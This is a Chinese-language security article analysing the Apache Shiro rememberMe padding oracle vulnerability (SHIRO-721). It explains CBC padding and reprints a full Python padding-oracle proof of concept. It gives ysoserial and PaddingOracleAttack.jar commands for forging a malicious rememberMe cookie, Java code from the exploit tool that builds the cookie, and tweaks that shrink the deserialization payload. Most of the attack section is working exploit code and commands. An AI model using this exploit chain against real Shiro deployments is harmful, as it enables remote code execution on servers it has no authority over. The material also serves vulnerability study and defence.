Shiro Padding Oracle攻击分析
安全客 - 有思想的安全新媒体
Shiro,Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
Padding Oracle Attack,这种攻击利用了服务器在 CBC(密码块链接模式)加密模式中的填充测试漏洞。如果输入的密文不合法,类库则会抛出异常,这便是一种提示。攻击者可以不断地提供密文,让解密程序给出提示,不断修正,最终得到的所需要的结果。其中"Oracle"一词指的是“提示”,与甲骨文公司并无关联。加密时可以使用多种填充规则,但最常见的填充方式之一是在PKCS#5标准中定义的规则。PCKS#5的填充方式为:明文的最后一个数据块包含N个字节的填充数据(N取决于明文最后一块的数据长度)。下图是一些示例,展示了不同长度的单词(FIG、BANANA、AVOCADO、PLANTAIN、PASSIONFRUIT)以及它们使用PKCS#5填充后的结果(每个数据块为8字节长)。
对称加密又称单密钥加密,也就是字面意思,加密解密用的都是同一个密钥,常见的对称加密算法,例如DES、3DES、Blowfish、IDEA、RC4、RC5、RC6 和 AES。
非对称加密,就是说密钥分两个,一个公钥,一个私钥,加解密过程就是公钥加密私钥解密和私钥加密公钥匙解密,常见的非对称加密算法有,RSA、ECC(移动设备用)、Diffie-Hellman、El Gamal、DSA(数字签名用)等。
分组密码,也叫块加密(block cyphers),一次加密明文中的一个块。是将明文按一定的位长分组,明文组经过加密运算得到密文组,密文组经过解密运算(加密运算的逆运算),还原成明文组。
序列密码,也叫流加密(stream cyphers),一次加密明文中的一个位。是指利用少量的密钥(制乱元素)通过某种复杂的运算(密码算法)产生大量的伪随机位流,用于对明文位流的加密。
- 电码本模式(Electronic Codebook Book (ECB))
- 密码分组链接模式(Cipher Block Chaining (CBC))
- 计算器模式(Counter (CTR))
- 密码反馈模式(Cipher FeedBack (CFB))
- 输出反馈模式(Output FeedBack (OFB))
跟ECB一样,先将明文分为等长的小段,但是此时会获取一个随机的 “初始向量(IV)” 参与算法。正是因为IV的参入,由得相同的明文在每一次CBC加密得到的密文不同。
计算器模式不常见,在CTR模式中, 有一个自增的算子,这个算子用密钥(K)加密之后的输出和明文(P)异或的结果得到密文(C),相当于一次一密。这种加密方式简单快速,安全可靠,而且可以并行加密,但是在计算器不能维持很长的情况下,密钥只能使用一次。
三、Padding Oracle攻击原理讲解
- 接受到正确的密文之后(填充正确且包含合法的值),应用程序正常返回(200 - OK)。
- 接受到非法的密文之后(解密后发现填充不正确),应用程序抛出一个解密异常(500 - Internal Server Error)。
- 接受到合法的密文(填充正确)但解密后得到一个非法的值,应用程序显示自定义错误消息(200 - OK)。
这里从freebuf借来一张图,上图简单的概述了''TEST"的解密过程,首先输入密码经过加解密算法可以得到一个中间结果 ,我们称之为中间值,中间值将会和初始向量IV进行异或运算后得到明文
- 拥有密文,这里的密文是“F851D6CC68FC9537”
- 知道初始向量IV
- 能够了解实时反馈,如服务器的200、500等信息。
上述参数中的“6D367076036E2239F851D6CC68FC9537”拆分来看就是 IV和密文的组合,所以可以得到IV是“6D367076036E2239”
Request: http://sampleapp/home.jsp?UID=0000000000000000F851D6CC68FC9537 Response: 500 - Internal Server Error
Request: http://sampleapp/home.jsp?UID=000000000000003CF851D6CC68FC9537 Response: 200 OK
在这个情况下,我们便可以推断出中间值(Intermediary Value)的最后一个字节,因为我们知道它和0x3C异或后的结果为0x01,于是:
因为 [Intermediary Byte] ^ 0x3C == 0x01, 得到 [Intermediary Byte] == 0x3C ^ 0x01, 所以 [Intermediary Byte] == 0x3D
当分块在一块之上时,如“ENCRYPT TEST”,攻击机制又是如何运作的呢?
1 """ 2 Padding Oracle Attack POC(CBC-MODE) 3 Author: axis( 4 5 2011.9 6 7 This program is based on Juliano Rizzo and Thai Duong's talk on 8 Practical Padding Oracle Attack.( 9 10 For Education Purpose Only!!! 11 12 This program is free software: you can redistribute it and/or modify 13 it under the terms of the GNU General Public License as published by 14 the Free Software Foundation, either version 3 of the License, or 15 (at your option) any later version. 16 17 This program is distributed in the hope that it will be useful, 18 but WITHOUT ANY WARRANTY; without even the implied warranty of 19 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 20 GNU General Public License for more details. 21 22 You should have received a copy of the GNU General Public License 23 along with this program. If not, see <>. 24 """ 25 26 import sys 27 28 # 29 from Crypto.Cipher import * 30 import binascii 31 32 # the key for encrypt/decrypt 33 # we demo the poc here, so we need the key 34 # in real attack, you can trigger encrypt/decrypt in a complete blackbox env 35 ENCKEY = 'abcdefgh' 36 37 def main(args): 38 print 39 print "=== Padding Oracle Attack POC(CBC-MODE) ===" 40 print "=== by axis ===" 41 print "=== ===" 42 print "=== 2011.9 ===" 43 print 44 45 ######################################## 46 # you may config this part by yourself 47 iv = '12345678' 48 plain = 'aaaaaaaaaaaaaaaaX' 49 plain_want = "opaas" 50 51 # you can choose cipher: blowfish/AES/DES/DES3/CAST/ARC2 52 cipher = "blowfish" 53 ######################################## 54 55 block_size = 8 56 if cipher.lower() == "aes": 57 block_size = 16 58 59 if len(iv) != block_size: 60 print "[-] IV must be "+str(block_size)+" bytes long(the same as block_size)!" 61 return False 62 63 print "=== Generate Target Ciphertext ===" 64 65 ciphertext = encrypt(plain, iv, cipher) 66 if not ciphertext: 67 print "[-] Encrypt Error!" 68 return False 69 70 print "[+] plaintext is: "+plain 71 print "[+] iv is: "+hex_s(iv) 72 print "[+] ciphertext is: "+ hex_s(ciphertext) 73 print 74 75 print "=== Start Padding Oracle Decrypt ===" 76 print 77 print "[+] Choosing Cipher: "+cipher.upper() 78 79 guess = padding_oracle_decrypt(cipher, ciphertext, iv, block_size) 80 81 if guess: 82 print "[+] Guess intermediary value is: "+hex_s(guess["intermediary"]) 83 print "[+] plaintext = intermediary_value XOR original_IV" 84 print "[+] Guess plaintext is: "+guess["plaintext"] 85 print 86 87 if plain_want: 88 print "=== Start Padding Oracle Encrypt ===" 89 print "[+] plaintext want to encrypt is: "+plain_want 90 print "[+] Choosing Cipher: "+cipher.upper() 91 92 en = padding_oracle_encrypt(cipher, ciphertext, plain_want, iv, block_size) 93 94 if en: 95 print "[+] Encrypt Success!" 96 print "[+] The ciphertext you want is: "+hex_s(en[block_size:]) 97 print "[+] IV is: "+hex_s(en[:block_size]) 98 print 99 100 print "=== Let's verify the custom encrypt result ===" 101 print "[+] Decrypt of ciphertext '"+ hex_s(en[block_size:]) +"' is:" 102 de = decrypt(en[block_size:], en[:block_size], cipher) 103 if de == add_PKCS5_padding(plain_want, block_size): 104 print de 105 print "[+] Bingo!" 106 else: 107 print "[-] It seems something wrong happened!" 108 return False 109 110 return True 111 else: 112 return False 113 114 115 def padding_oracle_encrypt(cipher, ciphertext, plaintext, iv, block_size=8): 116 # the last block 117 guess_cipher = ciphertext[0-block_size:] 118 119 plaintext = add_PKCS5_padding(plaintext, block_size) 120 print "[*] After padding, plaintext becomes to: "+hex_s(plaintext) 121 print 122 123 block = len(plaintext) 124 iv_nouse = iv # no use here, in fact we only need intermediary 125 prev_cipher = ciphertext[0-block_size:] # init with the last cipher block 126 while block > 0: 127 # we need the intermediary value 128 tmp = padding_oracle_decrypt_block(cipher, prev_cipher, iv_nouse, block_size, debug=False) 129 130 # calculate the iv, the iv is the ciphertext of the previous block 131 prev_cipher = xor_str( plaintext[block-block_size:block], tmp["intermediary"] ) 132 133 #save result 134 guess_cipher = prev_cipher + guess_cipher 135 136 block = block - block_size 137 138 return guess_cipher 139 140 141 def padding_oracle_decrypt(cipher, ciphertext, iv, block_size=8, debug=True): 142 # split cipher into blocks; we will manipulate ciphertext block by block 143 cipher_block = split_cipher_block(ciphertext, block_size) 144 145 if cipher_block: 146 result = {} 147 result["intermediary"] = '' 148 result["plaintext"] = '' 149 150 counter = 0 151 for c in cipher_block: 152 if debug: 153 print "[*] Now try to decrypt block "+str(counter) 154 print "[*] Block "+str(counter)+"'s ciphertext is: "+hex_s(c) 155 print 156 # padding oracle to each block 157 guess = padding_oracle_decrypt_block(cipher, c, iv, block_size, debug) 158 159 if guess: 160 iv = c 161 result["intermediary"] += guess["intermediary"] 162 result["plaintext"] += guess["plaintext"] 163 if debug: 164 print 165 print "[+] Block "+str(counter)+" decrypt!" 166 print "[+] intermediary value is: "+hex_s(guess["intermediary"]) 167 print "[+] The plaintext of block "+str(counter)+" is: "+guess["plaintext"] 168 print 169 counter = counter+1 170 else: 171 print "[-] padding oracle decrypt error!" 172 return False 173 174 return result 175 else: 176 print "[-] ciphertext's block_size is incorrect!" 177 return False 178 179 def padding_oracle_decrypt_block(cipher, ciphertext, iv, block_size=8, debug=True): 180 result = {} 181 plain = '' 182 intermediary = [] # list to save intermediary 183 iv_p = [] # list to save the iv we found 184 185 for i in range(1, block_size+1): 186 iv_try = [] 187 iv_p = change_iv(iv_p, intermediary, i) 188 189 # construct iv 190 # iv = \x00...(several 0 bytes) + \x0e(the bruteforce byte) + \xdc...(the iv bytes we found) 191 for k in range(0, block_size-i): 192 iv_try.append("\x00") 193 194 # bruteforce iv byte for padding oracle 195 # 1 bytes to bruteforce, then append the rest bytes 196 iv_try.append("\x00") 197 198 for b in range(0,256): 199 iv_tmp = iv_try 200 iv_tmp[len(iv_tmp)-1] = chr(b) 201 202 iv_tmp_s = ''.join("%s" % ch for ch in iv_tmp) 203 204 # append the result of iv, we've just calculate it, saved in iv_p 205 for p in range(0,len(iv_p)): 206 iv_tmp_s += iv_p[len(iv_p)-1-p] 207 208 # in real attack, you have to replace this part to trigger the decrypt program 209 #print hex_s(iv_tmp_s) # for debug 210 plain = decrypt(ciphertext, iv_tmp_s, cipher) 211 #print hex_s(plain) # for debug 212 213 # got it! 214 # in real attack, you have to replace this part to the padding error judgement 215 if check_PKCS5_padding(plain, i): 216 if debug: 217 print "[*] Try IV: "+hex_s(iv_tmp_s) 218 print "[*] Found padding oracle: " + hex_s(plain) 219 iv_p.append(chr(b)) 220 intermediary.append(chr(b ^ i)) 221 222 break 223 224 plain = '' 225 for ch in range(0, len(intermediary)): 226 plain += chr( ord(intermediary[len(intermediary)-1-ch]) ^ ord(iv[ch]) ) 227 228 result["plaintext"] = plain 229 result["intermediary"] = ''.join("%s" % ch for ch in intermediary)[::-1] 230 return result 231 232 # save the iv bytes found by padding oracle into a list 233 def change_iv(iv_p, intermediary, p): 234 for i in range(0, len(iv_p)): 235 iv_p[i] = chr( ord(intermediary[i]) ^ p) 236 return iv_p 237 238 def split_cipher_block(ciphertext, block_size=8): 239 if len(ciphertext) % block_size != 0: 240 return False 241 242 result = [] 243 length = 0 244 while length < len(ciphertext): 245 result.append(ciphertext[length:length+block_size]) 246 length += block_size 247 248 return result 249 250 251 def check_PKCS5_padding(plain, p): 252 if len(plain) % 8 != 0: 253 return False 254 255 # convert the string 256 plain = plain[::-1] 257 ch = 0 258 found = 0 259 while ch < p: 260 if plain[ch] == chr(p): 261 found += 1 262 ch += 1 263 264 if found == p: 265 return True 266 else: 267 return False 268 269 def add_PKCS5_padding(plaintext, block_size): 270 s = '' 271 if len(plaintext) % block_size == 0: 272 return plaintext 273 274 if len(plaintext) < block_size: 275 padding = block_size - len(plaintext) 276 else: 277 padding = block_size - (len(plaintext) % block_size) 278 279 for i in range(0, padding): 280 plaintext += chr(padding) 281 282 return plaintext 283 284 def decrypt(ciphertext, iv, cipher): 285 # we only need the padding error itself, not the key 286 # you may gain padding error info in other ways 287 # in real attack, you may trigger decrypt program 288 # a complete blackbox environment 289 key = ENCKEY 290 291 if cipher.lower() == "des": 292 o =, DES.MODE_CBC,iv) 293 elif cipher.lower() == "aes": 294 o =, AES.MODE_CBC,iv) 295 elif cipher.lower() == "des3": 296 o =, DES3.MODE_CBC,iv) 297 elif cipher.lower() == "blowfish": 298 o =, Blowfish.MODE_CBC,iv) 299 elif cipher.lower() == "cast": 300 o =, CAST.MODE_CBC,iv) 301 elif cipher.lower() == "arc2": 302 o =, ARC2.MODE_CBC,iv) 303 else: 304 return False 305 306 if len(iv) % 8 != 0: 307 return False 308 309 if len(ciphertext) % 8 != 0: 310 return False 311 312 return o.decrypt(ciphertext) 313 314 315 def encrypt(plaintext, iv, cipher): 316 key = ENCKEY 317 318 if cipher.lower() == "des": 319 if len(key) != 8: 320 print "[-] DES key must be 8 bytes long!" 321 return False 322 o =, DES.MODE_CBC,iv) 323 elif cipher.lower() == "aes": 324 if len(key) != 16 and len(key) != 24 and len(key) != 32: 325 print "[-] AES key must be 16/24/32 bytes long!" 326 return False 327 o =, AES.MODE_CBC,iv) 328 elif cipher.lower() == "des3": 329 if len(key) != 16: 330 print "[-] Triple DES key must be 16 bytes long!" 331 return False 332 o =, DES3.MODE_CBC,iv) 333 elif cipher.lower() == "blowfish": 334 o =, Blowfish.MODE_CBC,iv) 335 elif cipher.lower() == "cast": 336 o =, CAST.MODE_CBC,iv) 337 elif cipher.lower() == "arc2": 338 o =, ARC2.MODE_CBC,iv) 339 else: 340 return False 341 342 plaintext = add_PKCS5_padding(plaintext, len(iv)) 343 344 return o.encrypt(plaintext) 345 346 def xor_str(a,b): 347 if len(a) != len(b): 348 return False 349 350 c = '' 351 for i in range(0, len(a)): 352 c += chr( ord(a[i]) ^ ord(b[i]) ) 353 354 return c 355 356 def hex_s(str): 357 re = '' 358 for i in range(0,len(str)): 359 re += "\\x"+binascii.b2a_hex(str[i]) 360 return re 361 362 if __name__ == "__main__": 363 main(sys.argv)
该漏洞是Apache Shiro的issue编号为SHIRO-721的漏洞
RememberMe使用AES-128-CBC模式加密,容易受到Padding Oracle攻击,AES的初始化向量iv就是rememberMe的base64解码后的前16个字节,攻击者只要使用有效的RememberMe cookie作为Padding Oracle Attack 的前缀,然后就可以构造RememberMe进行反序列化攻击,攻击者无需知道RememberMe加密的密钥。
1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1
java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "ping" > payload.class
java -jar PaddingOracleAttack.jar targetUrl rememberMeCookie blockSize payloadFilePath
public PrincipalCollection getRememberedPrincipals(SubjectContext subjectContext) { PrincipalCollection principals = null; try { byte[] bytes = getRememberedSerializedIdentity(subjectContext); //SHIRO-138 - only call convertBytesToPrincipals if bytes exist: if (bytes != null && bytes.length > 0) { principals = convertBytesToPrincipals(bytes, subjectContext); } } catch (RuntimeException re) { principals = onRememberedPrincipalFailure(re, subjectContext); } return principals; }
1 protected byte[] getRememberedSerializedIdentity(SubjectContext subjectContext) { 2 3 if (!WebUtils.isHttp(subjectContext)) { 4 if (log.isDebugEnabled()) { 5 String msg = "SubjectContext argument is not an HTTP-aware instance. This is required to obtain a " + 6 "servlet request and response in order to retrieve the rememberMe cookie. Returning " + 7 "immediately and ignoring rememberMe operation."; 8 log.debug(msg); 9 } 10 return null; 11 } 12 13 WebSubjectContext wsc = (WebSubjectContext) subjectContext; 14 if (isIdentityRemoved(wsc)) { 15 return null; 16 } 17 18 HttpServletRequest request = WebUtils.getHttpRequest(wsc); 19 HttpServletResponse response = WebUtils.getHttpResponse(wsc); 20 21 String base64 = getCookie().readValue(request, response); 22 // Browsers do not always remove cookies immediately (SHIRO-183) 23 // ignore cookies that are scheduled for removal 24 if (Cookie.DELETED_COOKIE_VALUE.equals(base64)) return null; 25 26 if (base64 != null) { 27 base64 = ensurePadding(base64); 28 if (log.isTraceEnabled()) { 29 log.trace("Acquired Base64 encoded identity [" + base64 + "]"); 30 } 31 byte[] decoded = Base64.decode(base64); 32 if (log.isTraceEnabled()) { 33 log.trace("Base64 decoded byte array length: " + (decoded != null ? decoded.length : 0) + " bytes."); 34 } 35 return decoded; 36 } else { 37 //no cookie set - new site visitor? 38 return null; 39 } 40 }
principals = convertBytesToPrincipals(bytes, subjectContext);
1 protected PrincipalCollection convertBytesToPrincipals(byte[] bytes, SubjectContext subjectContext) { 2 if (getCipherService() != null) { 3 bytes = decrypt(bytes); 4 } 5 return deserialize(bytes); 6 }
1 public ByteSource decrypt(byte[] ciphertext, byte[] key) throws CryptoException { 2 3 byte[] encrypted = ciphertext; 4 5 //No IV, check if we need to read the IV from the stream: 6 byte[] iv = null; 7 8 if (isGenerateInitializationVectors(false)) { 9 try { 10 //We are generating IVs, so the ciphertext argument array is not actually 100% cipher text. Instead, it 11 //is: 12 // - the first N bytes is the initialization vector, where N equals the value of the 13 // 'initializationVectorSize' attribute. 14 // - the remaining bytes in the method argument (arg.length - N) is the real cipher text. 15 16 //So we need to chunk the method argument into its constituent parts to find the IV and then use 17 //the IV to decrypt the real ciphertext: 18 19 int ivSize = getInitializationVectorSize(); 20 int ivByteSize = ivSize / BITS_PER_BYTE; 21 22 //now we know how large the iv is, so extract the iv bytes: 23 iv = new byte[ivByteSize]; 24 System.arraycopy(ciphertext, 0, iv, 0, ivByteSize); 25 26 //remaining data is the actual encrypted ciphertext. Isolate it: 27 int encryptedSize = ciphertext.length - ivByteSize; 28 encrypted = new byte[encryptedSize]; 29 System.arraycopy(ciphertext, ivByteSize, encrypted, 0, encryptedSize); 30 } catch (Exception e) { 31 String msg = "Unable to correctly extract the Initialization Vector or ciphertext."; 32 throw new CryptoException(msg, e); 33 } 34 } 35 36 return decrypt(encrypted, key, iv); 37 }
private ByteSource decrypt(byte[] ciphertext, byte[] key, byte[] iv) throws CryptoException { if (log.isTraceEnabled()) { log.trace("Attempting to decrypt incoming byte array of length " + (ciphertext != null ? ciphertext.length : 0)); } byte[] decrypted = crypt(ciphertext, key, iv, javax.crypto.Cipher.DECRYPT_MODE); return decrypted == null ? null : ByteSource.Util.bytes(decrypted); }
1 public String encrypt(byte[] nextBLock) throws Exception { 2 logger.debug("Start encrypt data..."); 3 byte[][] plainTextBlocks = ArrayUtil.splitBytes(this.plainText, this.blockSize); //按blocksize大小分割plainText 4 5 if (nextBLock == null || nextBLock.length == 0 || nextBLock.length != this.blockSize) { 6 logger.warn("You provide block's size is not equal blockSize,try to reset it..."); 7 nextBLock = new byte[this.blockSize]; 8 } 9 byte randomByte = (byte) (new Random()).nextInt(127); 10 Arrays.fill(nextBLock, randomByte); 11 12 byte[] result = nextBLock; 13 byte[][] reverseplainTextBlocks = ArrayUtil.reverseTwoDimensionalBytesArray(plainTextBlocks);//反转数组顺序 14 this.encryptBlockCount = reverseplainTextBlocks.length; 15"Total %d blocks to encrypt", this.encryptBlockCount)); 16 17 for (byte[] plainTextBlock : reverseplainTextBlocks) { 18 nextBLock = this.getBlockEncrypt(plainTextBlock, nextBLock); //加密块, 19 result = ArrayUtil.mergerArray(nextBLock, result); //result中容纳每次加密后的内容 20 21 this.encryptBlockCount -= 1; 22"Left %d blocks to encrypt", this.encryptBlockCount)); 23 } 24 25"Generate payload success, send request count => %s", this.requestCount)); 26 27 return Base64.getEncoder().encodeToString(result); 28 }
private byte[] getBlockEncrypt(byte[] PlainTextBlock, byte[] nextCipherTextBlock) throws Exception { byte[] tmpIV = new byte[this.blockSize]; byte[] encrypt = new byte[this.blockSize]; Arrays.fill(tmpIV, (byte) 0); //初始化tmpIV for (int index = this.blockSize - 1; index >= 0; index--) { tmpIV[index] = this.findCharacterEncrypt(index, tmpIV, nextCipherTextBlock); //函数返回测试成功后的中间值 logger.debug(String.format("Current string => %s, the %d block", ArrayUtil.bytesToHex(ArrayUtil.mergerArray(tmpIV, nextCipherTextBlock)), this.encryptBlockCount)); } for (int index = 0; index < this.blockSize; index++) { encrypt[index] = (byte) (tmpIV[index] ^ PlainTextBlock[index]); //中间值与明文块异或得到IV,也就是上一个加密块的密文 } return encrypt; }
1 private byte findCharacterEncrypt(int index, byte[] tmpIV, byte[] nextCipherTextBlock) throws Exception { 2 if (nextCipherTextBlock.length != this.blockSize) { 3 throw new Exception("CipherTextBlock size error!!!"); 4 } 5 6 byte paddingByte = (byte) (this.blockSize - index); //本次需要填充的字节 7 byte[] preBLock = new byte[this.blockSize]; 8 Arrays.fill(preBLock, (byte) 0); 9 10 for (int ix = index; ix < this.blockSize; ix++) { 11 preBLock[ix] = (byte) (paddingByte ^ tmpIV[ix]); //更新IV 12 } 13 14 for (int c = 0; c < 256; c++) { 15 //nextCipherTextBlock[index] < 256,那么在这个循环结果中构成的结果还是range(1,256) 16 //所以下面两种写法都是正确的,当时看到原作者使用的是第一种方式有点迷,测试了下都可以 17 // preBLock[index] = (byte) (paddingByte ^ nextCipherTextBlock[index] ^ c); 18 preBLock[index] = (byte) c; 19 20 byte[] tmpBLock1 = Base64.getDecoder().decode(this.loginRememberMe); //RememberMe数据 21 byte[] tmpBlock2 = ArrayUtil.mergerArray(preBLock, nextCipherTextBlock); //脏数据 22 byte[] tmpBlock3 = ArrayUtil.mergerArray(tmpBLock1, tmpBlock2); 23 String remeberMe = Base64.getEncoder().encodeToString(tmpBlock3); 24 if (this.checkPaddingAttackRequest(remeberMe)) { 25 return (byte) (preBLock[index] ^ paddingByte); //返回中间值 26 } 27 } 28 throw new Exception("Occurs errors when find encrypt character, could't find a suiteable Character!!!"); 29 }
可以了解到之后所填充的脏数据是对反序列化没有影响的,通过这个机制就可以在之前的cookie上来运行Padding Oracle测试
for (int index = 0; index < this.blockSize; index++) { encrypt[index] = (byte) (tmpIV[index] ^ PlainTextBlock[index]); //中间值与明文块异或得到IV,也就是上一个加密块的密文 }
将所有的加密块加密后在经过Base64编码输出,就能得到完整利用的RememberMe Cookie了
public static class StubTransletPayload {} /* *PayloadMini public static class StubTransletPayload extends AbstractTranslet implements Serializable { private static final long serialVersionUID = -5971610431559700674L; public void transform ( DOM document, SerializationHandler[] handlers ) throws TransletException {} @Override public void transform ( DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {} } */
Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {classBytes}); /* *PayloadMini Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { classBytes, ClassFiles.classAsBytes(Foo.class) }); */
字节:2787kb -> 1402kb
- 《白帽子讲Web安全》,吴翰清著